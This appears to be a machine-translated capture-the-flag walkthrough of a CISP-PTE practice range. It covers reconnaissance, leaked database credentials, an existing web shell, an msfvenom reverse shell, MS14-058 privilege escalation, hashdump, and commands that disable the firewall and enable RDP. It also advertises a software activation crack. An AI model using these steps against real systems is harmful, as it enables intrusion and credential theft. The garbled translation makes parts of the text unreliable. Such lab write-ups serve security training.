CISP-PTE Comprehensive Range Analysis, msf Comprehensive Utilization MS14-058 [with Range Environment]
preamble
Friends who need the range, you can private letter in the background [pte range], there are network security learning group, you can pay attention to the menu bar after selecting the learning group to join can be
Information collection
The question asks: given an ip, find 3 KEYs.
nmap scan, to save time, change the port here and leave the-p-Full port scan. Source target is on port 20,000+.
Scan to this port for access
Kingsword scanning
there arecrawler protocol
Visit the backstage homepage
See if there's a git leak, reported an iis error screen, iis has the
Let's see if there's a backup file. Uh, good.
Opened it and saw the account password
Connecting with sqlserver don't know why it should be a system problem
utilizationpycharm professionalTo connect, specify the database, host, account, port, and password.
Reply [Activation] in the background to get itpycharm professional Activation tool for activation to 2099 (windows only)
There are 4 tables
Find the administrator password
Just logged in and found the first key
Web vulnerability exploitation
File upload, a can't even upload, means it's whitelisted, change your mindset
Here's where the analysis begins
Here we see this managing uploaded files with aaspxfile
Download it and see if it's notone-sentence * horse (idiom); fig. a wooden horse with a long history of abuse and neglectmodal particle indicating that sth. is obvious
Visit the source code to ask for this file
Try passing a parameter.
Ant Sword Connection
View System Information
Check the system configuration, change the password, no privileges
We return to the web directory, and there's a this is the second key
backward osmosis
Let's open kali and configure the bridge mode
Generate a backdoor and memorize this payload, sticky notes will suffice
show (a ticket)msfconsole
Use this modulemulti/handler
Since the generated * files are inside kali, which doesn't have an antsword, this is where we put thefig. under the counter (indirect way for influence or pressure)to this machine, then from this machine to the target machine, python3 opens the http service
local access to the IP address of this kali, this time if the page is not accessible, then the probability is that the firewall does not release the 8888 port, you need to release the 8888 port in kaili, command reference
sudo ufw allow 8888/tcp
After downloading it, use the ant-sword to transfer the file to the target target machine
Backdoor execution using web virtual shell
Bounce Shell Successful
Get system information, no permission
raise the right to speak
1、ms14-058
After successfully going live, use bg to maintain the session while continuing to execute other modules, you can see that a session will be generated after bg, remember this session, use thesearch windows/local/ms14_058
The search module.use 0
Specify the payload module as the first result of the search, the use of ms14_058 module, you need to set this session for the session you have just succeeded in the line, otherwise it will lead to unsuccessful execution, run
There's a problem here with an incorrectly configured port
The site has this vulnerability, but the shell session establishment is unsuccessful, this time is your port configuration is not correct, it must be your msfvenom backdoor using the module of the specified port, otherwise it will be unsuccessful!
Reset the port to the one set by msfvenom, most of the tutorials on the internet don't go into detail, they just go through the motions, I tried a lot of pitfalls myself before I realized that
As you can see, the authorization was successful, use hashdump to view the user hash passwords
decrypt hash passwords
Enable 3389 remote connection
run post/windows/manage/enable_rdp
We went to the root directory of the site and also found a bak file, 2022-12-12
Open, since it is our sqlserver database super administrator account and password
Using this sa account, turn off the firewall using the admin/mssql/mssql_exec module.
Successful execution, if you do not disable the firewall may lead to remote connection can not connect to the
Open desktop
2. Manual
Once you know the password for the sa account, log in using sa
Get the system command, this time found that sa has system system privileges
Turn off the firewall
netsh firewall set opmode mode="disable"
Enable 3389 remote connection
wmic rdtoggle where servername="%computername%" call setallowtsconnections 1
opens3389
Success, although there is no user password here, but you can create a new user and then log in remotely, here is another method
Find the key directly at the command line